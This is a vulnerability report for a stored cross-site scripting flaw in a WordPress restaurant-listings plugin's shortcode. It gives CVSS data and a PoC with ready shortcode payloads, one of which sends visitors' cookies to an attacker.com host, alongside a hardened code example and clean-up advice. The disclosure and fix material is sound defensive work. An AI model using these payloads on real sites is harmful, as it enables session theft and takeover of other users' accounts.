Security Vulnerability Report
CVE-2025-11830 CVSS 6.4 MEDIUM

CVE-2025-11830

Published: 2025-10-22 09:15:35
Last Modified: 2026-04-15 00:35:42

Description

The WP Restaurant Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' parameter of the restaurant_summary shortcode in all versions up to, and including, 1.0.2. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Restaurant Listings < 1.0.2
WP Restaurant Listings = 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html / php
<!--
CVE-2025-11830 PoC - Stored XSS via restaurant_summary shortcode 'align' parameter
Target: WP Restaurant Listings plugin <= 1.0.2
Requirement: Contributor-level access or above
-->
<!-- Step 1: Authenticate as a contributor-level user -->
<!-- Step 2: Create a new post or page -->
<!-- Step 3: Insert the following shortcode into the post content -->
[restaurant_summary align="><script>alert(document.cookie)</script>" id="1"]
<!-- Alternative payloads for cookie stealing or further exploitation: -->
[restaurant_summary align='" onmouseover="alert(1)' id="1"]
[restaurant_summary align="><img src=x onerror=alert(document.domain)>" id="1"]
[restaurant_summary align="><svg onload=fetch('https://attacker.com/steal?c='+document.cookie)>" id="1"]
<!--
Step 4: Publish the post
Step 5: When any user (including admins) views the post, the injected JavaScript
executes in their browser context.
-->
<?php
// Example of vulnerable code pattern (simplified from shortcodes.php ~line 511):
/*
function restaurant_summary_shortcode( $atts ) {
    $atts = shortcode_atts( array(
        'id'    => '',
        'align' => 'left', // <-- 'align' parameter is not sanitized
    ), $atts, 'restaurant_summary' );

    // VULNERABLE: Direct output without escaping
    $output  = '<div class="restaurant-summary" align="' . $atts['align'] . '">';
    $output .= get_restaurant_summary( $atts['id'] );
    $output .= '</div>';
    return $output;
}
*/
?>
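The hardened counterpart of the simplified vulnerable pattern above, as an added example (it is not the plugin's code or its actual patch): the 'align' value is constrained to an allowlist and then escaped at the point of output. The `example_*` names and the allowed values are assumptions; inside WordPress, `shortcode_atts()` and `esc_attr()` replace the stand-ins used here so the file runs on its own.

```php
<?php
// Added example. All example_* names are hypothetical, not taken from the plugin.

// Assumption: these are the only values the 'align' attribute ever needs.
const EXAMPLE_ALLOWED_ALIGN = array( 'left', 'right', 'center' );

// Escape a value for use inside a double-quoted HTML attribute.
// In WordPress this is esc_attr(); the fallback keeps the file runnable stand-alone.
function example_escape_attr( string $value ): string {
    return function_exists( 'esc_attr' )
        ? esc_attr( $value )
        : htmlspecialchars( $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

// Input validation: anything outside the allowlist falls back to the default.
function example_normalize_align( $raw ): string {
    $value = strtolower( trim( (string) $raw ) );
    return in_array( $value, EXAMPLE_ALLOWED_ALIGN, true ) ? $value : 'left';
}

// Builds the opening tag from the simplified pattern, with both controls applied.
function example_restaurant_summary_open_tag( array $atts ): string {
    // Stand-in for shortcode_atts(): fill in defaults for missing attributes.
    $atts  = array_merge( array( 'id' => '', 'align' => 'left' ), $atts );
    $align = example_normalize_align( $atts['align'] );

    // Output escaping stays even though the value is already allowlisted, so a
    // later change to the allowlist cannot reintroduce the attribute breakout.
    return '<div class="restaurant-summary" align="' . example_escape_attr( $align ) . '">';
}

if ( PHP_SAPI === 'cli' ) {
    // Constructed inputs: a legitimate value and the quote-breaking value from the PoC above.
    foreach ( array( 'right', '" onmouseover="alert(1)' ) as $sample ) {
        echo example_restaurant_summary_open_tag( array( 'id' => '1', 'align' => $sample ) ), PHP_EOL;
    }
}
```

Until a fixed plugin version is installed, searching stored post content for `[restaurant_summary` shortcodes whose `align` value is not one of the expected keywords identifies posts that need review.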

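References

https://plugins.trac.wordpress.org/browser/wp-restaurant-listings/tags/1.0.2/includes/class-wp-restaurant-listings-shortcodes.php#L511
https://www.wordfence.com/threat-intel/vulnerabilities/id/572b584e-b580-4d90-88b6-ee5b25678d9b?source=cve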

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11830", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:34.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Restaurant Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' parameter of the restaurant_summary shortcode in all versions up to, and including, 1.0.2. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-restaurant-listings/tags/1.0.2/includes/class-wp-restaurant-listings-shortcodes.php#L511", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/572b584e-b580-4d90-88b6-ee5b25678d9b?source=cve", "source": "[email protected]"}]}}